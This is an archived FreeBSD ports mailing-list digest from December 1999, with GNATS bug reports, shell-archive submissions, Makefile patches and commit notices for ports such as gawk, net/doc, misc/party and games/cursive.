Sat Dec 4 03:27:40 1999 +++ nqc/Makefile Sat Dec 4 03:30:27 1999 @@ -1,13 +1,13 @@ # New ports collection makefile for: nqc -# Version required: 2.0.1 +# Version required: 2.0.2 # Date created: 11 Aug 1999 # Whom: kbyanc # # $FreeBSD: ports/lang/nqc/Makefile,v 1.3 1999/10/10 23:30:18 steve Exp $ # -DISTNAME= nqc_src_2_0_1 -PKGNAME= nqc-2.0.1 +DISTNAME= nqc_src_2_0_2 +PKGNAME= nqc-2.0.2 CATEGORIES= lang MASTER_SITES= http://www.enteract.com/~dbaum/nqc/release/ diff -ruN nqc.orig/files/md5 nqc/files/md5 --- nqc.orig/files/md5 Sat Dec 4 03:27:40 1999 +++ nqc/files/md5 Sat Dec 4 03:28:33 1999 @@ -1 +1 @@ -MD5 (nqc_src_2_0_1.tar.gz) = 4e1189ccd1cb8050fa665924ef487032 +MD5 (nqc_src_2_0_2.tar.gz) = 5ad85b996e2f470362edff4014a0313e >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 4 1:30: 8 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 1C3D51535D for ; Sat, 4 Dec 1999 01:30:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id BAA57686; Sat, 4 Dec 1999 01:30:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from mail.dinoex.sub.org (mail.dinoex.sub.de [195.243.29.14]) by hub.freebsd.org (Postfix) with ESMTP id 41C1C15355 for ; Sat, 4 Dec 1999 01:27:10 -0800 (PST) (envelope-from dm@home.dinoex.sub.org) Received: (from uucp@localhost) by mail.dinoex.sub.org (8.9.3/8.9.3) with UUCP id KAA21319 for FreeBSD-gnats-submit@freebsd.org; Sat, 4 Dec 1999 10:25:59 +0100 (CET) Received: (from uucp@localhost) by net2.dinoex.sub.org (8.9.3/8.9.3) with UUCP id IAA27692 for FreeBSD-gnats-submit@freebsd.org; Sat, 4 Dec 1999 08:35:29 +0100 (CET) Received: (from dm@localhost) by home.dinoex.sub.org (8.9.3/8.9.3) id IAA40745; Sat, 4 Dec 1999 08:28:13 +0100 (CET) Message-Id: <199912040728.IAA40745@home.dinoex.sub.org> Date: Sat, 4 Dec 1999 08:28:13 +0100 (CET) From: dirk.meyer@dinoex.sub.org Reply-To: dirk.meyer@dinoex.sub.org To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15254: lang/gawk does not install Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15254 >Category: ports >Synopsis: lang/gawk does not install >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sat Dec 4 01:30:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Dirk Meyer >Release: FreeBSD 3.3-RELEASE i386 >Organization: privat >Environment: install gawk under elf >Description: The makefiles uses "INSTALL_PROGRAM" to install scripts, together with then strip option the install fails. >How-To-Repeat: make install >Fix: create a patch dir in the port and add these patches. diff gawk/patches/patch-Makefile.in gawk-3.0.4/patches/patch-Makefile.in --- gawk/patches/patch-Makefile.in Thu Jan 1 01:00:00 1970 +++ gawk-3.0.4/patches/patch-Makefile.in Mon Oct 11 07:54:56 1999 @@ -0,0 +1,10 @@ +--- Makefile.in.orig Wed Jun 9 10:36:30 1999 ++++ Makefile.in Mon Oct 11 07:54:39 1999 +@@ -184,7 +184,6 @@ + then $(LN_S) gawk awk; \ + fi; exit 0) + cd doc && $(MAKE) install +- cd awklib && $(MAKE) install + + installdirs: mkinstalldirs + $(srcdir)/mkinstalldirs $(bindir) $(datadir) \ diff gawk/patches/patch-doc-Makefile.in gawk-3.0.4/patches/patch-doc-Makefile.in --- gawk/patches/patch-doc-Makefile.in Thu Jan 1 01:00:00 1970 +++ gawk-3.0.4/patches/patch-doc-Makefile.in Tue Oct 19 08:07:40 1999 @@ -0,0 +1,11 @@ +--- doc/Makefile.in.orig Wed Apr 28 16:21:56 1999 ++++ doc/Makefile.in Tue Oct 19 07:54:59 1999 +@@ -69,7 +69,7 @@ + + all: $(DOCS) info + +-install: $(mandir)/gawk$(manext) $(mandir)/igawk$(manext) $(infodir)/gawk.info ++install: $(mandir)/gawk$(manext) $(infodir)/gawk.info + + $(infodir)/gawk.info:: + -if test -f gawk.info; then d=.; \ >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 4 4:30:15 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 4485B14D36 for ; Sat, 4 Dec 1999 04:30:11 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id EAA67171; Sat, 4 Dec 1999 04:30:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from titanium.yy.ics.keio.ac.jp (titanium.yy.ics.keio.ac.jp [131.113.47.73]) by hub.freebsd.org (Postfix) with ESMTP id AD33B14BC2 for ; Sat, 4 Dec 1999 04:21:55 -0800 (PST) (envelope-from sanpei@sanpei.org) Received: from lavender.yy.cs.keio.ac.jp (u1033.seaple.icc.ne.jp [210.170.9.33]) by titanium.yy.ics.keio.ac.jp (8.9.3+3.2W/3.7W) with ESMTP id VAA19488; Sat, 4 Dec 1999 21:20:24 +0900 (JST) (envelope-from sanpei@sanpei.org) Received: (from sanpei@localhost) by lavender.yy.cs.keio.ac.jp (8.9.3/3.7W) id VAA05022; Sat, 4 Dec 1999 21:20:21 +0900 (JST) Message-Id: <199912041220.VAA05022@lavender.yy.cs.keio.ac.jp> Date: Sat, 4 Dec 1999 21:20:21 +0900 (JST) From: sanpei@sanpei.org Reply-To: sanpei@sanpei.org To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15256: new port: net/doc (diagnose unhealthy DNS domains) Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15256 >Category: ports >Synopsis: new port: net/doc (diagnose unhealthy DNS domains) >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sat Dec 4 04:30:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: MIHIRA Yoshiro >Release: FreeBSD 3.2-RELEASE i386 >Organization: Yokohama, Japan >Environment: >Description: Hi. I ported net/doc (diagnose unhealthy DNS domains) Thank you. >How-To-Repeat: >Fix: # This is a shell archive. Save it in a file, remove anything before # this line, and then unpack it by entering "sh file". Note, it may # create directories; files and directories will be owned by you and # have default permissions. # # This archive contains: # # doc/Makefile # doc/files # doc/patches # doc/pkg # doc/files/md5 # doc/patches/patch-aa # doc/pkg/COMMENT # doc/pkg/DESCR # doc/pkg/PLIST # echo x - doc/Makefile sed 's/^X//' >doc/Makefile << 'END-of-doc/Makefile' X# New ports collection makefile for: doc X# Version required: 2.1.4 X# Date created: 28 November 1999 X# Whom: MIHIRA Yoshiro X# X# $FreeBSD$ X# X XDISTNAME= doc-2.1.4 XCATEGORIES= net XMASTER_SITES= ftp://ftp.his.com/pub/brad/dns/ X XMAINTAINER= sanpei@jp.FreeBSD.org X XAUX_DIR= lib/doc XAUX_FILES= doc1.awk doc3.awk doc4.awk INFO RFC.XXXX X XMAN8= doc.8 X Xdo-build: X @${MV} ${WRKSRC}/doc ${WRKSRC}/doc.org X @${SED} -e 's|$${PREFIX}|${PREFIX}|g' -e 's|$${AUX_DIR}|${AUX_DIR}|g' ${WRKSRC}/doc.org \ X > ${WRKSRC}/doc X Xdo-install: X @${MKDIR} ${PREFIX}/${AUX_DIR} X @${INSTALL_SCRIPT} ${WRKSRC}/doc ${PREFIX}/bin/doc X @for file in ${AUX_FILES}; do \ X ${INSTALL_DATA} ${WRKSRC}/$$file ${PREFIX}/${AUX_DIR}/ ; \ X done X.if !defined(NOPORTDOCS) X @${INSTALL_DATA} ${WRKSRC}/doc.8 ${PREFIX}/man/man8/doc.8 X.endif X X.include END-of-doc/Makefile echo c - doc/files mkdir -p doc/files > /dev/null 2>&1 echo c - doc/patches mkdir -p doc/patches > /dev/null 2>&1 echo c - doc/pkg mkdir -p doc/pkg > /dev/null 2>&1 echo x - doc/files/md5 sed 's/^X//' >doc/files/md5 << 'END-of-doc/files/md5' XMD5 (doc-2.1.4.tar.gz) = 087695e712f3420bea68b4d9f54add9a END-of-doc/files/md5 echo x - doc/patches/patch-aa sed 's/^X//' >doc/patches/patch-aa << 'END-of-doc/patches/patch-aa' X--- doc.org Sun Nov 28 17:21:08 1999 X+++ doc Sun Nov 28 17:22:36 1999 X@@ -65,7 +65,7 @@ X ## Note: Make *sure* you keep the trailing slash on the directory X ## name, otherwise doc won't work right. X ## X-set auxd=/users/brad/bin/doc-2.1.4/ X+set auxd=${PREFIX}/${AUX_DIR}/ X #set auxd="" X X ######## where are log files written? END-of-doc/patches/patch-aa echo x - doc/pkg/COMMENT sed 's/^X//' >doc/pkg/COMMENT << 'END-of-doc/pkg/COMMENT' Xdiagnose unhealthy DNS domains END-of-doc/pkg/COMMENT echo x - doc/pkg/DESCR sed 's/^X//' >doc/pkg/DESCR << 'END-of-doc/pkg/DESCR' XDoc is an automated tool for verifying (to an extent) that a Xdomain is configured and functioning correctly. It makes no Xattempt to validate the data inside a domain, only the structure. XThe only required parameter is the valid domain name of an existing Xdomain. Example: X X doc isi.edu. END-of-doc/pkg/DESCR echo x - doc/pkg/PLIST sed 's/^X//' >doc/pkg/PLIST << 'END-of-doc/pkg/PLIST' Xbin/doc Xlib/doc/doc1.awk Xlib/doc/doc3.awk Xlib/doc/doc4.awk Xlib/doc/INFO Xlib/doc/RFC.XXXX X@dirrm lib/doc END-of-doc/pkg/PLIST exit >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 4 11:28:26 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id C82F714F71; Sat, 4 Dec 1999 11:28:19 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Received: (from cpiazza@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA47181; Sat, 4 Dec 1999 11:28:16 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Date: Sat, 4 Dec 1999 11:28:16 -0800 (PST) From: Message-Id: <199912041928.LAA47181@freefall.freebsd.org> To: dirk.meyer@dinoex.sub.org, cpiazza@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15254: lang/gawk does not install Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: lang/gawk does not install State-Changed-From-To: open->closed State-Changed-By: cpiazza State-Changed-When: Sat Dec 4 11:28:07 PST 1999 State-Changed-Why: Andreas fixed this, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 4 12:17:11 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id AE8B015163; Sat, 4 Dec 1999 12:17:09 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Received: (from cpiazza@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA49793; Sat, 4 Dec 1999 12:16:59 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Date: Sat, 4 Dec 1999 12:16:59 -0800 (PST) From: Message-Id: <199912042016.MAA49793@freefall.freebsd.org> To: cpiazza@FreeBSD.org, freebsd-ports@FreeBSD.org, green@FreeBSD.org Subject: Re: ports/15107: Patch for FreeBSD s/key support in OpenSSH 1.2 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Patch for FreeBSD s/key support in OpenSSH 1.2 Responsible-Changed-From-To: freebsd-ports->green Responsible-Changed-By: cpiazza Responsible-Changed-When: Sat Dec 4 12:16:50 PST 1999 Responsible-Changed-Why: Over to maintainer To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 4 12:28:39 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id A89B514F62; Sat, 4 Dec 1999 12:28:35 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Received: (from cpiazza@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA50636; Sat, 4 Dec 1999 12:28:31 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Date: Sat, 4 Dec 1999 12:28:31 -0800 (PST) From: Message-Id: <199912042028.MAA50636@freefall.freebsd.org> To: jedgar@fxp.org, cpiazza@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15191: Update port: net/elsa Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update port: net/elsa State-Changed-From-To: open->closed State-Changed-By: cpiazza State-Changed-When: Sat Dec 4 12:28:27 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 4 12:45: 2 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id B28E91538D; Sat, 4 Dec 1999 12:44:49 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Received: (from cpiazza@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA51480; Sat, 4 Dec 1999 12:43:38 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Date: Sat, 4 Dec 1999 12:43:38 -0800 (PST) From: Message-Id: <199912042043.MAA51480@freefall.freebsd.org> To: sanpei@sanpei.org, cpiazza@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15256: new port: net/doc (diagnose unhealthy DNS domains) Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: new port: net/doc (diagnose unhealthy DNS domains) State-Changed-From-To: open->closed State-Changed-By: cpiazza State-Changed-When: Sat Dec 4 12:43:31 PST 1999 State-Changed-Why: New port committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 4 14: 0:14 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 469ED14C2E for ; Sat, 4 Dec 1999 14:00:09 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id OAA69414; Sat, 4 Dec 1999 14:00:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from byzantine.student.umd.edu (byzantine.student.umd.edu [129.2.244.158]) by hub.freebsd.org (Postfix) with ESMTP id 237631535D for ; Sat, 4 Dec 1999 13:52:18 -0800 (PST) (envelope-from howardjp@byzantine.student.umd.edu) Received: (from howardjp@localhost) by byzantine.student.umd.edu (8.9.3/8.9.3) id QAA31180; Sat, 4 Dec 1999 16:54:49 -0500 (EST) (envelope-from howardjp) Message-Id: <199912042154.QAA31180@byzantine.student.umd.edu> Date: Sat, 4 Dec 1999 16:54:49 -0500 (EST) From: howardjp@wam.umd.edu Reply-To: howardjp@wam.umd.edu To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15258: New port: misc/party Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15258 >Category: ports >Synopsis: New port: misc/party >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sat Dec 4 14:00:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: James Howard >Release: FreeBSD 4.0-CURRENT i386 >Organization: University of Maryland >Environment: FreeBSD byzantine.student.umd.edu 4.0-CURRENT FreeBSD 4.0-CURRENT #60: Tue Nov 30 10:38:30 EST 1999 howardjp@byzantine.student.umd.edu:/usr/src/sys/compile/BYZANTINE i386 >Description: Party is a simple multi-user chat system developed in the early- and mid-1980s for use on freenets (Chinet and M-Net being the biggies). Myself and several others still use this software daily for communications on a variety of hosts. At their request, I have prepared a FreeBSD Port of the software. >How-To-Repeat: N/A >Fix: # This is a shell archive. Save it in a file, remove anything before # this line, and then unpack it by entering "sh file". Note, it may # create directories; files and directories will be owned by you and # have default permissions. # # This archive contains: # # party # party/pkg # party/pkg/COMMENT # party/pkg/DESCR # party/pkg/PLIST # party/files # party/files/md5 # party/Makefile # echo c - party mkdir -p party > /dev/null 2>&1 echo c - party/pkg mkdir -p party/pkg > /dev/null 2>&1 echo x - party/pkg/COMMENT sed 's/^X//' >party/pkg/COMMENT << 'END-of-party/pkg/COMMENT' XSimple multi-user chat system END-of-party/pkg/COMMENT echo x - party/pkg/DESCR sed 's/^X//' >party/pkg/DESCR << 'END-of-party/pkg/DESCR' XParty is a real-time chat program for Unix systems. It simulates a party Xline, where any number of users can talk at the same time - if you type a Xline of text, everyone else sees it immediately. X XChat programs are pretty common these days. Party wasn't the first, but it Xwas an early one. It's antiquity is reflected in the fact that it doesn't Xsupport networked systems especially well, nor have a web Xinterface. However, its maturity is reflected in the fact that it has a Xclean and simple interface, and a good set of well-integrated features Xthat make it easy for first-timers to get into. It remains very popular to Xthis day on several systems. END-of-party/pkg/DESCR echo x - party/pkg/PLIST sed 's/^X//' >party/pkg/PLIST << 'END-of-party/pkg/PLIST' X@owner nobody X@group nobody X@cd /usr/local Xbin/party Xlib/party/chantab Xlib/party/partytab Xlib/party/partytmp Xlib/party/log/party.log X@dirrm lib/party/log X@dirrm lib/party END-of-party/pkg/PLIST echo c - party/files mkdir -p party/files > /dev/null 2>&1 echo x - party/files/md5 sed 's/^X//' >party/files/md5 << 'END-of-party/files/md5' XMD5 (party-2.12.tar.gz) = 356577d15463016fefee465976fde554 END-of-party/files/md5 echo x - party/Makefile sed 's/^X//' >party/Makefile << 'END-of-party/Makefile' X# New ports collection makefile for: party X# Version required: 2.12 X# Date created: 4 December 1999 X# Whom: James Howard X# X# $FreeBSD$ X# X XDISTNAME= party-2.12 XPKGNAME= party-2.12 XCATEGORIES= misc XMASTER_SITES= ftp://ftp.wam.umd.edu/pub/howardjp/software/party/ \ X http://www.wam.umd.edu/~howardjp/software/party/ \ X ftp://dragon.ham.muohio.edu/pub/howardjp/software/party/ X XMAINTAINER= howardjp@wam.umd.edu X XMAN1= party.1 X Xdo-install: X ${INSTALL_SCRIPT} -g nobody -o nobody -m 4711 ${WRKSRC}/party ${PREFIX}/bin X ${MKDIR} ${PREFIX}/lib/party X ${MKDIR} ${PREFIX}/lib/party/log X ${INSTALL_SCRIPT} ${WRKSRC}/chantab ${WRKSRC}/partytab ${PREFIX}/lib/party X ${TOUCH} ${PREFIX}/lib/party/partytmp X ${TOUCH} ${PREFIX}/lib/party/log/party.log X ${CHOWN} -R nobody:nobody ${PREFIX}/lib/party X ${CP} ${WRKSRC}/party.1 ${PREFIX}/man/man1/ X X Xpost-extract: X @(cd ${WRKSRC}; ${RM} -f .depend) X X.include END-of-party/Makefile exit >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 4 14:50:36 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 56939153E2 for ; Sat, 4 Dec 1999 14:50:13 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id OAA72925; Sat, 4 Dec 1999 14:50:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from byzantine.student.umd.edu (byzantine.student.umd.edu [129.2.244.158]) by hub.freebsd.org (Postfix) with ESMTP id 46EED151A7 for ; Sat, 4 Dec 1999 14:49:15 -0800 (PST) (envelope-from howardjp@byzantine.student.umd.edu) Received: (from howardjp@localhost) by byzantine.student.umd.edu (8.9.3/8.9.3) id RAA34397; Sat, 4 Dec 1999 17:51:54 -0500 (EST) (envelope-from howardjp) Message-Id: <199912042251.RAA34397@byzantine.student.umd.edu> Date: Sat, 4 Dec 1999 17:51:54 -0500 (EST) From: howardjp@freebsd.org Reply-To: howardjp@freebsd.org To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15260: New port: games/cursive Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15260 >Category: ports >Synopsis: New port: games/cursive >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sat Dec 4 14:50:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: James Howard >Release: FreeBSD 4.0-CURRENT i386 >Organization: University of Maryland >Environment: FreeBSD byzantine.student.umd.edu 4.0-CURRENT FreeBSD 4.0-CURRENT #60: Tue Nov 30 10:38:30 EST 1999 howardjp@byzantine.student.umd.edu:/usr/src/sys/compile/BYZANTINE i386 >Description: Cursive is a simple program that takes input and prints out an ASCIIfied cursive version, example: FreeBSD _____ __ () __ / ' / ) /\ / ) ,-/-, __ _ _ /--< / ) / / (_/ / (_(/_(/_/___/ /__/__/__/_ >How-To-Repeat: N/A >Fix: # This is a shell archive. Save it in a file, remove anything before # this line, and then unpack it by entering "sh file". Note, it may # create directories; files and directories will be owned by you and # have default permissions. # # This archive contains: # # cursive/ # cursive/files # cursive/files/md5 # cursive/patches # cursive/patches/patch-aa # cursive/patches/patch-ab # cursive/patches/patch-ac # cursive/pkg # cursive/pkg/COMMENT # cursive/pkg/DESCR # cursive/pkg/PLIST # cursive/Makefile # echo c - cursive/ mkdir -p cursive/ > /dev/null 2>&1 echo c - cursive/files mkdir -p cursive/files > /dev/null 2>&1 echo x - cursive/files/md5 sed 's/^X//' >cursive/files/md5 << 'END-of-cursive/files/md5' XMD5 (cursive.tgz) = 6051416ca5dac79c63ba1511b915b6d2 END-of-cursive/files/md5 echo c - cursive/patches mkdir -p cursive/patches > /dev/null 2>&1 echo x - cursive/patches/patch-aa sed 's/^X//' >cursive/patches/patch-aa << 'END-of-cursive/patches/patch-aa' X--- Makefile.orig Sat Dec 4 17:19:30 1999 X+++ Makefile Sat Dec 4 17:19:40 1999 X@@ -1,5 +1,7 @@ X CFLAGS = -g X X+all: cursive X+ X cursive: cursive.o x.o xs.o X cc -g -o cursive cursive.o x.o xs.o X END-of-cursive/patches/patch-aa echo x - cursive/patches/patch-ab sed 's/^X//' >cursive/patches/patch-ab << 'END-of-cursive/patches/patch-ab' X--- cursive.c.orig Sat Dec 4 17:20:55 1999 X+++ cursive.c Sat Dec 4 17:21:32 1999 X@@ -128,7 +128,7 @@ X else X { X /* Message from standard input */ X- while (gets(message) != NULL) X+ while (fgets(message, sizeof(message), stdin) != NULL) X prline(message); X } X } END-of-cursive/patches/patch-ab echo x - cursive/patches/patch-ac sed 's/^X//' >cursive/patches/patch-ac << 'END-of-cursive/patches/patch-ac' X--- cursive.6.orig Sat Dec 4 17:31:42 1999 X+++ cursive.6 Sat Dec 4 17:32:03 1999 X@@ -3,7 +3,7 @@ X .SH NAME X cursive \- print text in cursive script X .SH SYNOPSIS X-.B /usr/games/cursive X+.B cursive X [ X .BI \-i n X ] END-of-cursive/patches/patch-ac echo c - cursive/pkg mkdir -p cursive/pkg > /dev/null 2>&1 echo x - cursive/pkg/COMMENT sed 's/^X//' >cursive/pkg/COMMENT << 'END-of-cursive/pkg/COMMENT' XCreate ASCII character cursive handwriting END-of-cursive/pkg/COMMENT echo x - cursive/pkg/DESCR sed 's/^X//' >cursive/pkg/DESCR << 'END-of-cursive/pkg/DESCR' XCursive is a program for generating cursive signatures and text like X X ___ _ __ _ X ( ) ' ) / // _/_ X __/___. ____ / / / __|/ / _ __ X / / (_/|_/ / (_ (_(_/ (_) \_(__(/_/ (_ X (_/ X XDo not be fooled by inferior immitations (like the figlet font which Xdoesn't connect letters right). This is the one and only original Xcursive program. END-of-cursive/pkg/DESCR echo x - cursive/pkg/PLIST sed 's/^X//' >cursive/pkg/PLIST << 'END-of-cursive/pkg/PLIST' Xbin/cursive END-of-cursive/pkg/PLIST echo x - cursive/Makefile sed 's/^X//' >cursive/Makefile << 'END-of-cursive/Makefile' X# New ports collection makefile for: cursive X# Version required: 1.0 X# Date created: 4 December 1999 X# Whom: James Howard X# X# $FreeBSD$ X# X XDISTNAME= cursive XPKGNAME= cursive XCATEGORIES= games XMASTER_SITES= ftp://puck.nether.net/pub/janc/ XEXTRACT_SUFX= .tgz X XMAINTAINER= howardjp@wam.umd.edu X XMAN6= cursive.6 X Xdo-install: X ${INSTALL_SCRIPT} ${WRKSRC}/cursive ${PREFIX}/bin X ${INSTALL_SCRIPT} ${WRKSRC}/cursive.6 ${PREFIX}/man/man6 X X.include END-of-cursive/Makefile exit >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 4 15: 7:13 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 42D4E1542B; Sat, 4 Dec 1999 15:07:07 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Received: (from cpiazza@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA74473; Sat, 4 Dec 1999 15:07:06 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Date: Sat, 4 Dec 1999 15:07:06 -0800 (PST) From: Message-Id: <199912042307.PAA74473@freefall.freebsd.org> To: tkato@prontomail.ne.jp, cpiazza@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15224: Update port: graphics/tiff to 3.5.3 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update port: graphics/tiff to 3.5.3 State-Changed-From-To: open->closed State-Changed-By: cpiazza State-Changed-When: Sat Dec 4 15:06:57 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 4 15:11:35 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 279C014A1C for ; Sat, 4 Dec 1999 15:11:34 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA74654; Sat, 4 Dec 1999 15:10:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Sat, 4 Dec 1999 15:10:02 -0800 (PST) Message-Id: <199912042310.PAA74654@freefall.freebsd.org> To: freebsd-ports@FreeBSD.org Cc: From: James Howard Subject: Re: ports/15260: New port: games/cursive Reply-To: James Howard Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR ports/15260; it has been noted by GNATS. From: James Howard To: freebsd-gnats-submit@freebsd.org Cc: Subject: Re: ports/15260: New port: games/cursive Date: Sat, 4 Dec 1999 18:00:19 -0500 (EST) I forgot to change my email address from "howardjp" to "howardjp@wam.umd.edu" and it changed it to "howardjp@freebsd.org". Is this a bug or a feature? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 4 15:24:23 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id EB1FC153B0; Sat, 4 Dec 1999 15:24:04 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Received: (from cpiazza@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA75570; Sat, 4 Dec 1999 15:22:56 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Date: Sat, 4 Dec 1999 15:22:56 -0800 (PST) From: Message-Id: <199912042322.PAA75570@freefall.freebsd.org> To: k5@cheerful.com, cpiazza@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15216: Update port: emulators/xsystem35 -> 1.2.4 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update port: emulators/xsystem35 -> 1.2.4 State-Changed-From-To: 